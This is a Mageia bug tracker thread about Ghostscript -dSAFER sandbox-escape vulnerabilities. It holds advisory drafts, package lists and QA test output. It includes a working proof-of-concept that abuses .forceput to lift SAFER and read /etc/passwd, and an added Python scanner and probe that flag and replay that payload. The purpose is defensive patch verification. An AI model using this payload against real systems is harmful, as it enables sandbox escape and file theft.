A security issue fixed upstream in Ghostscript has been announced:
https://www.openwall.com/lists/oss-security/2018/10/09/4

The commits that fixed the issue are linked from the message above.

Mageia 6 is also affected.
Whiteboard: (none) => MGA6TOO
Bug 23526, our previous update, didn't mention:
CVE-2018-11645
CVE-2018-16585
CVE-2018-17183

Ubuntu has issued advisories for those on September 19 and October 1:
https://usn.ubuntu.com/3768-1/
https://usn.ubuntu.com/3773-1/
Assigning to all packagers collectively, since there is no registered maintainer for this package. Also CC'ing two committers.
CC: (none) => marja11, nicolas.salguero, smelror
Assignee: bugsquad => pkg-bugs
Suggested advisory:
========================

The updated packages fix many bugs and a security vulnerability:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/09/4
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.mga6
ghostscript-dvipdf-9.25-1.mga6
ghostscript-common-9.25-1.mga6
ghostscript-X-9.25-1.mga6
ghostscript-module-X-9.25-1.mga6
lib(64)gs9-9.25-1.mga6
lib(64)gs-devel-9.25-1.mga6
lib(64)ijs1-0.35-140.mga6
lib(64)ijs-devel-0.35-140.mga6
ghostscript-doc-9.25-1.mga6

from SRPMS:
ghostscript-9.25-1.mga6.src.rpm
Status: NEW => ASSIGNED
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)
Assignee: pkg-bugs => qa-bugs
What about Comment 1?
Keywords: (none) => feedback
(In reply to David Walser from comment #4)
> What about Comment 1?

According to MITRE:
- CVE-2018-11645: Ghostscript before 9.21rc1
- CVE-2018-16585: Ghostscript before 9.24
- CVE-2018-17183: Ghostscript before 9.25, but the commit linked to that CVE was already in our ghostscript-9.24 package.
Thanks!
Keywords: feedback => (none)
One more commit is necessary: https://www.openwall.com/lists/oss-security/2018/10/11/3
And yet another needed commit with a new CVE: https://www.openwall.com/lists/oss-security/2018/10/10/12
Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.1.mga6
ghostscript-dvipdf-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
ghostscript-X-9.25-1.1.mga6
ghostscript-module-X-9.25-1.1.mga6
lib(64)gs9-9.25-1.1.mga6
lib(64)gs-devel-9.25-1.1.mga6
lib(64)ijs1-0.35-140.1.mga6
lib(64)ijs-devel-0.35-140.1.mga6
ghostscript-doc-9.25-1.1.mga6

from SRPMS:
ghostscript-9.25-1.1.mga6.src.rpm
Mageia 6, x86_64

Topped up the pre-update packages.

Before update:

CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/10/12

$ gs -dSAFER -sDEVICE=ppmraw
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) [...] null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
GS>quit

Quoting the reference above:
"Once you have a reference to forceput, you can do anything you like, see the exploit for CVE-2018-18073 as an example of abusing forceput to get arbitrary filesystem access."

I could not find that exploit but updating solved the problem.

Waiting for the mirrors to sync. Tested the earlier update. When the new files appear I will run through the same tests again and report any differences in behaviour.

After the first update you can access the error stack safely:

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--]
GS>

Ran a few simple tests of gs.

Displayed a postscript file.

$ gs abc-0.ps
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Querying operating system for font files...
Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular.
Can't find (or can't open) font file BorzoiRegular.
Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done.
>>showpage, press <return> to continue<<
GS>quit

LibreOffice has ghostscript support. The same file displayed OK with that.

Browsed an e-book pdf file with gs, hitting return to turn the pages. On quit it insisted on flicking through the rest of the 832 pages.

Converted a dvi file to a pdf.

$ dvipdf refcard.dvi refcard.pdf
dvips: Font cmbx10 at 13824 not found; scaling 600 instead.
dvips: Such scaling will generate extremely poor output.
Page 1 may be too complex to print
Page 2 may be too complex to print
Page 5 may be too complex to print
Page 6 may be too complex to print
Warning: no %%Page comments generated.

In fact it reproduced perfectly in okular - no loss of quality.

Looks OK for 64-bits.
CC: (none) => tarazed25
CVE-2018-18073 has reserved status; no details of possible exploits available. Passing it on.
Whiteboard: (none) => MGA6-64-OK
Ugh, another commit is needed for CVE-2018-18284: https://www.openwall.com/lists/oss-security/2018/10/16/2 Can we add it in?
Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

1Policy operator gives access to .forceput. (CVE-2018-18284)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
https://www.openwall.com/lists/oss-security/2018/10/16/2
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
lib(64)gs9-9.25-1.2.mga6
lib(64)gs-devel-9.25-1.2.mga6
lib(64)ijs1-0.35-140.2.mga6
lib(64)ijs-devel-0.35-140.2.mga6
ghostscript-doc-9.25-1.2.mga6

from SRPMS:
ghostscript-9.25-1.2.mga6.src.rpm
CVE: (none) => CVE-2018-17961, CVE-2018-18073, CVE-2018-18284
Summary: ghostscript new security issue CVE-2018-17961 and CVE-2018-18073 => ghostscript new security issue CVE-2018-17961, CVE-2018-18073 and CVE-2018-18284
Whiteboard: MGA6-64-OK => (none)
ghostscript-9.25-1.1.mga6

CVE-2018-18284
Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash)
GS>quit

The new version is not on the mirrors yet. Later.
Updated the packages.

$ rpm -qa | grep ghostscript
ghostscript-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
Error: /undefined in .policyprocs
Operand stack:
   --dict:963/1684(ro)(G)--   SAFER   false   --dict:0/0(L)--   --dict:0/0(L)--   --dict:963/1684(ro)(G)--   (ignored)   SAFER   false
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   %loop_continue   --nostringval--   --nostringval--   false   1   %stopped_push   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--
Dictionary stack:
   --dict:963/1684(ro)(G)--   --dict:0/20(G)--   --dict:79/200(L)--
Current allocation mode is local
Last OS error: No such file or directory
Current file position is 34

Any further attempts to use systemdict are thwarted in the same way. Good result.

Ran simple tests again. Printed a postscript file. It looks fine.
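The two checks above are typed interactively into gs and read by eye. As an added example (not code from this bug, from Mageia or from Ghostscript), here is the same idea in a form a packager or QA tester could keep in a script: a small PostScript tokenizer that strips comments and string literals and flags the operator names the public PoCs on this bug rely on (.forceput, .policyprocs, the $error /estack trick, the Permit* user parameters), plus a non-interactive probe that feeds the CVE-2018-18284 sequence from the bug to the installed gs under -dSAFER and reports whether it still works. The name list, the PROBE-ESCAPED marker, the nullpage device and the sample documents are assumptions of this example, not part of the original PoC.

```python
"""Added example for this bug (not code from the bug, from Mageia or from
Ghostscript): scan_postscript() drops comments and string literals and flags
the operator names the public PoCs on this bug rely on, checking string
bodies separately so that (.forceput) cvn is reported too; probe_gs() runs
the CVE-2018-18284 sequence quoted in the bug under -dSAFER and reports
whether the installed gs still accepts it. The name list, the marker string
and the nullpage device are choices made for this example, not part of the PoC.
"""
import re
import shutil
import subprocess

# Names the PoCs on this bug depend on (an assumption of this example). A
# finding is an indicator for review, not proof of an exploit.
SUSPICIOUS_NAMES = {
    ".forceput", ".policyprocs", ".setglobal", ".systemvar", "$error", "estack",
    "SAFER", "PermitFileReading", "PermitFileWriting", "PermitFileControl",
}

# A PostScript name runs until whitespace or a delimiter character.
_NAME = re.compile(r"[^\s()<>\[\]{}/%]+")


def _strip_comments_and_strings(src):
    """Return (code, strings): src with comments removed and every (...) or
    <hex> string replaced by a space, plus the decoded string bodies."""
    code, strings = [], []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c == "%":                               # comment runs to end of line
            while i < n and src[i] not in "\r\n":
                i += 1
        elif c == "(":                             # nested, backslash-escaped
            depth, j = 1, i + 1
            while j < n and depth:
                if src[j] == "\\":
                    j += 2
                    continue
                depth += {"(": 1, ")": -1}.get(src[j], 0)
                j += 1
            strings.append(src[i + 1:j - 1])
            code.append(" ")
            i = j
        elif src.startswith("<<", i):              # dictionary delimiter, keep it
            code.append("<<")
            i += 2
        elif c == "<":                             # hex string (ASCII85 not handled)
            j = src.find(">", i + 1) + 1 or n      # unterminated: swallow the rest
            try:
                body = bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", src[i + 1:j - 1]))
                strings.append(body.decode("latin-1"))
            except ValueError:
                pass
            code.append(" ")
            i = j
        else:
            code.append(c)
            i += 1
    return "".join(code), strings


def scan_postscript(src):
    """Sorted (kind, name) findings: 'operator' for a bare or /literal name in
    code, 'string' for a string literal whose body is such a name."""
    code, strings = _strip_comments_and_strings(src)
    found = {("operator", t) for t in _NAME.findall(code) if t in SUSPICIOUS_NAMES}
    found |= {("string", s.strip()) for s in strings if s.strip() in SUSPICIOUS_NAMES}
    return sorted(found)


# The CVE-2018-18284 sequence from the bug, followed by a marker of our own.
PROBE_PS = ("/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs "
            "1 get exec pop pop pop pop pop pop pop } def "
            "systemdict /SAFER false .forceput (PROBE-ESCAPED) = ")


def probe_gs(gs="gs", timeout=30):
    """'gs-missing', 'vulnerable' (the redefined .forceput ran and the marker
    was printed) or 'patched' (.policyprocs is undefined, so gs errors first)."""
    if shutil.which(gs) is None:
        return "gs-missing"
    proc = subprocess.run(
        [gs, "-q", "-dSAFER", "-dNOPAUSE", "-dBATCH", "-sDEVICE=nullpage", "-c", PROBE_PS],
        stdin=subprocess.DEVNULL, capture_output=True, text=True, timeout=timeout)
    return "vulnerable" if "PROBE-ESCAPED" in proc.stdout else "patched"


# Constructed samples; the first follows the PoC quoted in the bug.
POC_SAMPLE = r"""%!PS
/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec
  pop pop pop pop pop pop pop } def
systemdict /SAFER false .forceput
systemdict /userparams get /PermitFileReading [(*)] .forceput
(/etc/passwd) (r) file 1024 string readline pop ==
"""
OBFUSCATED_SAMPLE = "%!PS\n(.forceput) cvn <2e706f6c69637970726f6373> cvn pop pop\n"
BENIGN_SAMPLE = "%!PS\n% .forceput only in a comment\n(a (nested) \\) .forceput) show showpage\n"
```

Running scan_postscript over the three samples reports the four operator names in the PoC, the two string-built names in the obfuscated sample and nothing for the benign one; probe_gs returns 'patched' against a ghostscript carrying the 1.2 update and 'vulnerable' against 1.1. Static findings are only a triage signal: a document can also build names at run time, which is why the dynamic probe, not the scanner, is the test to keep in package QA.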
Looks good to me, after Len's tests. Validating. Correct (I think) advisory suggestion in Comment 13.
Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => advisory
CC: (none) => tmb
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0408.html
Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED